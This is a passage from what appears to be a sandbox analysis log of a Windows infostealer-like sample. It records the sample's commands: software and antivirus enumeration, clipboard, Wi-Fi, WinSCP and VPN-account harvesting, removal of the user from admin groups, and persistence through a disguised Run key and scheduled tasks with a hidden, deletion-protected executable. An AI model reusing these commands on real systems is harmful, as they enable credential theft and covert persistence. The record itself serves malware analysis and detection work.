    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 124.0.2 (x64 en-US)"
    3⤵
    PID:2656
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService""
  2⤵
  PID:4500
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService"
    3⤵
    PID:5056
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2""
  2⤵
  PID:1832
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2"
    3⤵
    PID:692
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ProPlusRetail - en-us""
  2⤵
  PID:1040
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ProPlusRetail - en-us"
    3⤵
    PID:3128
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent""
  2⤵
  PID:1688
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent"
    3⤵
    PID:2412
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VLC media player""
  2⤵
  PID:4876
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VLC media player"
    3⤵
    PID:4964
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC""
  2⤵
  PID:4424
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3292
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC"
    3⤵
    PID:4416
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{01B2627D-8443-41C0-97F0-9F72AC2FD6A0}""
  2⤵
  PID:3708
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{01B2627D-8443-41C0-97F0-9F72AC2FD6A0}"
    3⤵
    PID:3092
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1B690A4C-381A-40D4-BA4A-3F8ACD5CE797}""
  2⤵
  PID:1368
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1B690A4C-381A-40D4-BA4A-3F8ACD5CE797}"
    3⤵
    PID:4304
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}""
  2⤵
  PID:4668
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}"
    3⤵
    PID:3132
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{2BB73336-4F69-4141-9797-E9BD6FE3980A}""
  2⤵
  PID:4300
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{2BB73336-4F69-4141-9797-E9BD6FE3980A}"
    3⤵
    PID:2408
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}""
  2⤵
  PID:2120
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}"
    3⤵
    PID:5048
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3A96B93E-763F-41E7-85C7-1F3CCC37EF27}""
  2⤵
  PID:3356
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3880
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3A96B93E-763F-41E7-85C7-1F3CCC37EF27}"
    3⤵
    PID:796
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}""
  2⤵
  PID:3456
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}"
    3⤵
    PID:4536
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}""
  2⤵
  PID:3124
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3156
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}"
    3⤵
    PID:3004
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180381}""
  2⤵
  PID:1752
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180381}"
    3⤵
    PID:3148
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{662A0088-6FCD-45DD-9EA7-68674058AED5}""
  2⤵
  PID:4980
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{662A0088-6FCD-45DD-9EA7-68674058AED5}"
    3⤵
    PID:808
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6DB765A8-05AF-49A1-A71D-6F645EE3CE41}""
  2⤵
  PID:5016
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6DB765A8-05AF-49A1-A71D-6F645EE3CE41}"
    3⤵
    PID:3728
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{7447A794-FA2E-42BE-BA9A-5FCBD54C5DF3}""
  2⤵
  PID:3228
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{7447A794-FA2E-42BE-BA9A-5FCBD54C5DF3}"
    3⤵
    PID:2376
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{77924AE4-039E-4CA4-87B4-2F64180381F0}""
  2⤵
  PID:5056
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{77924AE4-039E-4CA4-87B4-2F64180381F0}"
    3⤵
    PID:812
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{79043ED0-7ED1-4227-A5E5-04C5594D21F7}""
  2⤵
  PID:4800
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4716
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{79043ED0-7ED1-4227-A5E5-04C5594D21F7}"
    3⤵
    PID:1040
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-007E-0000-1000-0000000FF1CE}""
  2⤵
  PID:1220
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-007E-0000-1000-0000000FF1CE}"
    3⤵
    PID:3324
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-1000-0000000FF1CE}""
  2⤵
  PID:4964
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-1000-0000000FF1CE}"
    3⤵
    PID:4656
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0409-1000-0000000FF1CE}""
  2⤵
  PID:4748
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0409-1000-0000000FF1CE}"
    3⤵
    PID:2164
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{9F51D16B-42E8-4A4A-8228-75045541A2AE}""
  2⤵
  PID:4564
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{9F51D16B-42E8-4A4A-8228-75045541A2AE}"
    3⤵
    PID:4064
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{BCC2FB07-8CF0-4542-B10C-61BCEF04AFF2}""
  2⤵
  PID:1368
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{BCC2FB07-8CF0-4542-B10C-61BCEF04AFF2}"
    3⤵
    PID:4644
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{C7B73281-AB0A-4DAD-A09F-5C30D40679AC}""
  2⤵
  PID:2776
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{C7B73281-AB0A-4DAD-A09F-5C30D40679AC}"
    3⤵
    PID:1916
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}""
  2⤵
  PID:1976
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}"
    3⤵
    PID:5048
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CE4D7AE0-FCBA-486F-A58F-DBA3626FBE4B}""
  2⤵
  PID:2088
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CE4D7AE0-FCBA-486F-A58F-DBA3626FBE4B}"
    3⤵
    PID:4148
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}""
  2⤵
  PID:3356
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}"
    3⤵
    PID:3548
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{D46F1FD9-2FE8-4D05-B2AC-011C23B69B24}""
  2⤵
  PID:4032
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{D46F1FD9-2FE8-4D05-B2AC-011C23B69B24}"
    3⤵
    PID:3124
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{E634F316-BEB6-4FB3-A612-F7102F576165}""
  2⤵
  PID:1936
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{E634F316-BEB6-4FB3-A612-F7102F576165}"
    3⤵
    PID:1752
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\he9kdOi1zqjI_tezmp.ps1""
  2⤵
  PID:808
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\he9kdOi1zqjI_tezmp.ps1"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:3300
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "mullvad account get"
  2⤵
  PID:5044
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName | findstr /V /B /C:displayName || echo No Antivirus installed"
  2⤵
  PID:3376
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName
    3⤵
    PID:4968
- - C:\Windows\system32\findstr.exe
    findstr /V /B /C:displayName
    3⤵
    PID:3824
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:4980
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:1724
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "netsh wlan show profile"
  2⤵
  - System Network Configuration Discovery: Wi-Fi Discovery
  PID:2552
- - C:\Windows\system32\netsh.exe
    netsh wlan show profile
    3⤵
    - Event Triggered Execution: Netsh Helper DLL
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:4800
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions""
  2⤵
  PID:3728
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions"
    3⤵
    PID:2400
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Remove-LocalGroupMember -Group 'Administrateurs' -Member 'Admin'""
  2⤵
  PID:1416
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Remove-LocalGroupMember -Group 'Administrateurs' -Member 'Admin'"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:1536
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Remove-LocalGroupMember -Group 'Remote Desktop Users' -Member 'Admin'""
  2⤵
  PID:1064
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Remove-LocalGroupMember -Group 'Remote Desktop Users' -Member 'Admin'"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:4748
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Remove-LocalGroupMember -Group 'Power Users' -Member 'Admin'""
  2⤵
  PID:1756
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Remove-LocalGroupMember -Group 'Power Users' -Member 'Admin'"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:3708
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Remove-LocalGroupMember -Group 'Administrators' -Member 'Admin'""
  2⤵
  PID:2344
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Remove-LocalGroupMember -Group 'Administrators' -Member 'Admin'"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:4184
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "(Get-LocalUser -Name 'Admin').PrincipalSource""
  2⤵
  PID:3124
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "(Get-LocalUser -Name 'Admin').PrincipalSource"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:4104
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "icacls "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles" /deny Admin:(DE,DC)"
  2⤵
  PID:1684
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3968
- - C:\Windows\system32\icacls.exe
    icacls "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles" /deny Admin:(DE,DC)
    3⤵
    - Modifies file permissions
    PID:1648
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v WindowsDriverSetupDqrF7k /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\xxd.exe /f"
  2⤵
  PID:3648
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v WindowsDriverSetupDqrF7k /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\xxd.exe /f
    3⤵
    - Adds Run key to start application
    PID:1696
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "cmd /c schtasks /create /sc onlogon /tn WindowsDriverSetupDqrF7k /tr \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\xxd.exe\" /F /rl highest"
  2⤵
  PID:2664
- - C:\Windows\system32\cmd.exe
    cmd /c schtasks /create /sc onlogon /tn WindowsDriverSetupDqrF7k /tr \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\xxd.exe\" /F /rl highest
    3⤵
    PID:1864
  - - C:\Windows\system32\schtasks.exe
      schtasks /create /sc onlogon /tn WindowsDriverSetupDqrF7k /tr \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\xxd.exe\" /F /rl highest
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:3348
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "attrib +h +s \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\xxd.exe\"""
  2⤵
  - Hide Artifacts: Hidden Files and Directories
  PID:2088
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "attrib +h +s \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\xxd.exe\""
    3⤵
    - Hide Artifacts: Hidden Files and Directories
    PID:1308
  - - C:\Windows\system32\attrib.exe
      "C:\Windows\system32\attrib.exe" +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\xxd.exe
      4⤵
      Views/modifies file attributes
      PID:3128
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Remove-LocalGroupMember -Group 'Administrateurs' -Member 'Admin'""
  2⤵
  PID:4824
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Remove-LocalGroupMember -Group 'Administrateurs' -Member 'Admin'"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:4044
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Remove-LocalGroupMember -Group 'Remote Desktop Users' -Member 'Admin'""
  2⤵
  PID:3904
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Remove-LocalGroupMember -Group 'Remote Desktop Users' -Member 'Admin'"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:1776
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Remove-LocalGroupMember -Group 'Power Users' -Member 'Admin'""
  2⤵
  PID:4668
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Remove-LocalGroupMember -Group 'Power Users' -Member 'Admin'"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:4796
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Remove-LocalGroupMember -Group 'Administrators' -Member 'Admin'""
  2⤵
  PID:4060
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:2024
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Remove-LocalGroupMember -Group 'Administrators' -Member 'Admin'"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:1804
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "(Get-LocalUser -Name 'Admin').PrincipalSource""
  2⤵
  PID:668
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4424
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "(Get-LocalUser -Name 'Admin').PrincipalSource"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:864
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "icacls "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\xxd.exe" /deny Admin:(DE,DC)"
  2⤵
  PID:3600
- - C:\Windows\system32\icacls.exe
    icacls "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\xxd.exe" /deny Admin:(DE,DC)
    3⤵
    - Modifies file permissions
    PID:4764
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell -command " $Action = New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xxd.exe' $Trigger = New-ScheduledTaskTrigger -Daily -At '12:00PM' Register-ScheduledTask -Action $Action -Trigger $Trigger -TaskName StartCacaTask ""
  2⤵
  PID:1484
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -command "
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:4528
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "mullvad account logout"
  2⤵
  PID:228
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:1564
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Roaming\salut3HHCi.ps1" -RunAsAdministrator"
  2⤵
  - Access Token Manipulation: Create Process with Token
  PID:4404
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Roaming\salut3HHCi.ps1" -RunAsAdministrator
    3⤵
    - Access Token Manipulation: Create Process with Token
    - Command and Scripting Interpreter: PowerShell
    PID:1232
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:4184
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:1316
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:1220
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:2648
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:3004
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:936
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:5016
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:4564
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:4524
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:4068
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:1628
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:1668
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:1004
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:1368
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:3324
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    - Clipboard Data
    PID:3524
- C:\Windows\system32\cmd.exe
